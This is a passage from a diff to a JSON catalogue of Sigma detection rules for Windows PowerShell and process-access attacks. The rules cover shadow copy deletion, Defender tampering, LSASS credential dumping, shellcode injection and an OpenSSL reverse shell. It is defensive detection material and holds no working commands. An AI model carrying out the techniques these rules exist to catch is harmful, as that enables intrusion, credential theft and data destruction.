"attack.privilege_escalation", + "attack.t1574.011" + ] + }, + "uuid": "22d80745-6f2c-46da-826b-77adaededd74", + "value": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS" + }, + { + "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as\na precursor for Collection and to identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/15", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_smb_share_reco.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_smb_share_reco.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, + "uuid": "95f0643a-ed40-467c-806b-aac9542ec5ab", + "value": "Suspicious Get Information for SMB Share" + }, + { + "description": "Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.", + "meta": { + "author": "frack113", + "creation_date": "2022/01/23", + "falsepositive": [ + "Legitimate administrative script" + ], + "filename": "posh_ps_susp_ssl_keyword.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1573/T1573.md#atomic-test-1---openssl-c2", + "https://medium.com/walmartglobaltech/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_ssl_keyword.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1573" + ] + }, + "uuid": "195626f3-5f1b-4403-93b7-e6cfd4d6a078", + "value": "Suspicious SSL Connection" + }, + { + "description": "Powershell use PassThru option to start in background", + "meta": { + "author": "frack113", + "creation_date": "2022/01/15", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_start_process.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.003/T1036.003.md", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Start-Process?view=powershell-5.1&viewFallbackFrom=powershell-7", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_start_process.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "uuid": "0718cd72-f316-4aa2-988f-838ea8533277", + "value": "Suspicious Start-Process PassThru" + }, + { + "description": "Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.", + "meta": { + "author": "frack113", + "creation_date": "2022/02/01", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_unblock_file.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-3---remove-the-zoneidentifier-alternate-data-stream", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/unblock-file?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_unblock_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.005" + ] + }, + "uuid": "5947497f-1aa4-41dd-9693-c9848d58727d", + "value": "Suspicious Unblock-File" + }, + { + "description": "An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users.\nThis may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/26", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_wallpaper.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1491.001/T1491.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_wallpaper.yml" + ], + "tags": [ + "attack.impact", + "attack.t1491.001" + ] + }, + "uuid": "c5ac6a1e-9407-45f5-a0ce-ca9a0806a287", + "value": "Replace Desktop Wallpaper by Powershell" + }, + { + "description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.", + "meta": { + "author": "frack113", + "creation_date": "2021/08/23", + "falsepositive": [ + "Admin script" + ], + "filename": "posh_ps_susp_win32_pnpentity.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1120/T1120.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_pnpentity.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1120" + ] + }, + "uuid": "b26647de-4feb-4283-af6b-6117661283c5", + "value": "Powershell Suspicious Win32_PnPEntity" + }, + { + "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "meta": { + "author": "frack113", + "creation_date": "2021/12/26", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_win32_shadowcopy.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_shadowcopy.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", + "value": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script" + }, + { + "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/20", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", + "https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_shadowcopy_deletion.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "c1337eb8-921a-4b59-855b-4ba188ddcc42", + "value": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script" + }, + { + "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden\n", + "meta": { + "author": "frack113", + "creation_date": "2021/10/20", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_windowstyle.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.003/T1564.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_windowstyle.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.003" + ] + }, + "uuid": "313fbb0a-a341-4682-848d-6d6f8c4fab7c", + "value": "Suspicious PowerShell WindowStyle Option" + }, + { + "description": "Detects usage of the \"Write-EventLog\" cmdlet with 'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/16", + "falsepositive": [ + "Legitimate applications writing events via this cmdlet. Investigate alerts to determine if the action is benign" + ], + "filename": "posh_ps_susp_write_eventlog.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://www.blackhillsinfosec.com/windows-event-logs-for-red-teams/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_write_eventlog.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e", + "value": "PowerShell Write-EventLog Usage" + }, + { + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "meta": { + "author": "frack113", + "creation_date": "2021/07/20", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_zip_compress.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_zip_compress.yml" + ], + "tags": [ + "attack.collection", + "attack.t1074.001" + ] + }, + "uuid": "b7a3c9a3-09ea-4934-8864-6a32cacd98d9", + "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Script" + }, + { + "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", + "meta": { + "author": "Ensar Şamil, @sblmsrsn, OSCD Community", + "creation_date": "2020/10/05", + "falsepositive": [ + "App-V clients" + ], + "filename": "posh_ps_syncappvpublishingserver_exe.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "dddfebae-c46f-439c-af7a-fdb6bde90218", + "value": "SyncAppvPublishingServer Execution to Bypass Powershell Restriction" + }, + { + "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", + "meta": { + "author": "frack113, elhoim", + "creation_date": "2022/01/16", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_tamper_defender.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", + "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_defender.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "14c71865-6cd3-44ae-adaa-1db923fae5f2", + "value": "Tamper Windows Defender - ScriptBlockLogging" + }, + { + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/05", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_tamper_defender_remove_mppreference.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_defender_remove_mppreference.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "ae2bdd58-0681-48ac-be7f-58ab4e593458", + "value": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging" + }, + { + "description": "Adversaries may communicate using a protocol and port paring that are typically not associated.\nFor example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/23", + "falsepositive": [ + "Legitimate administrative script" + ], + "filename": "posh_ps_test_netconnection.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1571/T1571.md#atomic-test-1---testing-usage-of-uncommonly-used-port-with-powershell", + "https://docs.microsoft.com/en-us/powershell/module/nettcpip/test-netconnection?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_test_netconnection.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1571" + ] + }, + "uuid": "adf876b3-f1f8-4aa9-a4e4-a64106feec06", + "value": "Testing Usage of Uncommonly Used Port" + }, + { + "description": "Adversaries may modify file time attributes to hide new or changes to existing files.\nTimestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/08/03", + "falsepositive": [ + "Legitimate admin script" + ], + "filename": "posh_ps_timestomp.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", + "https://www.offensive-security.com/metasploit-unleashed/timestomp/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_timestomp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.006" + ] + }, + "uuid": "c6438007-e081-42ce-9483-b067fbef33c3", + "value": "Powershell Timestomp" + }, + { + "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles.", + "meta": { + "author": "frack113", + "creation_date": "2021/08/18", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_trigger_profiles.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.013/T1546.013.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_trigger_profiles.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1546.013" + ] + }, + "uuid": "05b3e303-faf0-4f4a-9b30-46cc13e69152", + "value": "Powershell Trigger Profiles by Add_Content" + }, + { + "description": "Detects the use of various web request POST or PUT methods (including aliases) via Windows PowerShell command", + "meta": { + "author": "frack113", + "creation_date": "2022/01/07", + "falsepositive": [ + "Legitimate script" + ], + "filename": "posh_ps_upload.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1020/T1020.md", + "https://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_upload.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1020" + ] + }, + "uuid": "d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb", + "value": "Windows PowerShell Upload Web Request" + }, + { + "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/11/17", + "falsepositive": [ + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + ], + "filename": "posh_ps_user_discovery_get_aduser.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ] + }, + "uuid": "c2993223-6da8-4b1a-88ee-668b8bf315e9", + "value": "User Discovery And Export Via Get-ADUser Cmdlet - PowerShell" + }, + { + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/17", + "falsepositive": [ + "Rare intended use of hidden services", + "Rare FP could occure due to the non linearity of the ScriptBlockText log" + ], + "filename": "posh_ps_using_set_service_to_hide_services.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Alh4zr3d/status/1580925761996828672", + "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" + ] + }, + "uuid": "953945c5-22fe-4a92-9f8a-a9edc1e522da", + "value": "Abuse of Service Permissions to Hide Services Via Set-Service - PS" + }, + { + "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell logs", + "meta": { + "author": "James Pemberton / @4A616D6573", + "creation_date": "2019/10/24", + "falsepositive": [ + "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." + ], + "filename": "posh_ps_web_request_cmd_and_cmdlets.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/", + "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "1139d2e2-84b1-4226-b445-354492eba8ba", + "value": "Usage Of Web Request Commands And Cmdlets - PowerShell" + }, + { + "description": "Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class", + "meta": { + "author": "frack113", + "creation_date": "2022/04/24", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_win32_product_install_msi.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_win32_product_install_msi.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.007" + ] + }, + "uuid": "91109523-17f0-4248-a800-f81d9e7c081d", + "value": "PowerShell WMI Win32_Product Install MSI" + }, + { + "description": "Detects when a user disables the Windows Firewall via a Profile to help evade defense.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_windows_firewall_profile_disabled.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps", + "https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell", + "http://powershellhelp.space/commands/set-netfirewallrule-psv5.php", + "http://woshub.com/manage-windows-firewall-powershell/", + "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] + }, + "uuid": "488b44e7-3781-4a71-888d-c95abfacf44d", + "value": "Windows Firewall Profile Disabled" + }, + { + "description": "Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\nRegistry entries in HKLM\\Software[Wow6432Node]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are\nused to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to\nload and execute malicious DLLs and/or executables.\n", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_winlogon_helper_dll.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_winlogon_helper_dll.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.004" + ] + }, + "uuid": "851c506b-6b7c-4ce2-8802-c703009d03c0", + "value": "Winlogon Helper DLL" + }, + { + "description": "Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/16", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_win_defender_exclusions_added.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/windows-defender-exclusions-added-via-powershell.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_win_defender_exclusions_added.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562", + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "c1344fa2-323b-4d2e-9176-84b4d4821c88", + "value": "Windows Defender Exclusions Added - PowerShell" + }, + { + "description": "Detects parameters used by WMImplant", + "meta": { + "author": "NVISO", + "creation_date": "2020/03/26", + "falsepositive": [ + "Administrative scripts that use the same keywords." + ], + "filename": "posh_ps_wmimplant.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/FortyNorthSecurity/WMImplant", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmimplant.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.t1059.001" + ] + }, + "uuid": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", + "value": "WMImplant Hack Tool" + }, + { + "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.", + "meta": { + "author": "frack113", + "creation_date": "2021/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_wmi_persistence.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md", + "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Persistence.psm1#L545", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_persistence.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1546.003" + ] + }, + "uuid": "9e07f6e7-83aa-45c6-998e-0af26efd0a85", + "value": "Powershell WMI Persistence" + }, + { + "description": "Detects known WMI recon method to look for unquoted service paths, often used by pentest inside of powershell scripts attackers enum scripts", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/20", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_wmi_unquoted_service_search.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", + "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1", + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "09658312-bc27-4a3b-91c5-e49ab9046d1b", + "value": "WMIC Unquoted Services Path Lookup - PowerShell" + }, + { + "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/19", + "falsepositive": [ + "Legitimate administrative script" + ], + "filename": "posh_ps_xml_iex.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-8---powershell-xml-requests", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_xml_iex.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "6c6c6282-7671-4fe9-a0ce-a2dcebdc342b", + "value": "Powershell XML Execute Command" + }, + { + "description": "Detects shellcode injection by Metasploit's migrate and Empire's psinject", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2022/03/11", + "falsepositive": [ + "Empire's csharp_exe payload uses 0x1f3fff for process enumeration as well" + ], + "filename": "process_access_win_shellcode_inject_msf_empire.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "250ae82f-736e-4844-a68b-0b5e8cc887da", + "value": "Shellcode Injection" + }, + { + "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", + "meta": { + "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", + "creation_date": "2022/06/29", + "falsepositive": [ + "Unknown" + ], + "filename": "process_access_win_susp_seclogon.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1541920424635912196", + "https://github.com/elastic/detection-rules/blob/2bc1795f3d7bcc3946452eb4f07ae799a756d94e/rules/windows/credential_access_lsass_handle_via_malseclogon.toml", + "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/process_access_win_susp_seclogon.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "472159c5-31b9-4f56-b794-b766faa8b0a7", + "value": "Suspicious LSASS Access Via MalSecLogon" + }, + { + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "meta": { + "author": "Nik Seetharaman", + "creation_date": "2018/07/16", + "falsepositive": [ + "Legitimate CMSTP use (unlikely in modern enterprise environments)" + ], + "filename": "proc_access_win_cmstp_execution_by_access.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cmstp_execution_by_access.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.003", + "attack.execution", + "attack.t1559.001", + "attack.g0069", + "attack.g0080", + "car.2019-04-001" + ] + }, + "uuid": "3b4b232a-af90-427c-a22f-30b0c0837b95", + "value": "CMSTP Execution Process Access" + }, + { + "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://github.com/boku7/injectAmsiBypass", + "https://github.com/boku7/spawn", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cobaltstrike_bof_injection_pattern.yml" + ], + "tags": [ + "attack.execution", + "attack.t1106", + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "09706624-b7f6-455d-9d02-adee024cee1d", + "value": "CobaltStrike BOF Injection Pattern" + }, + { + "description": "Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools", + "meta": { + "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community 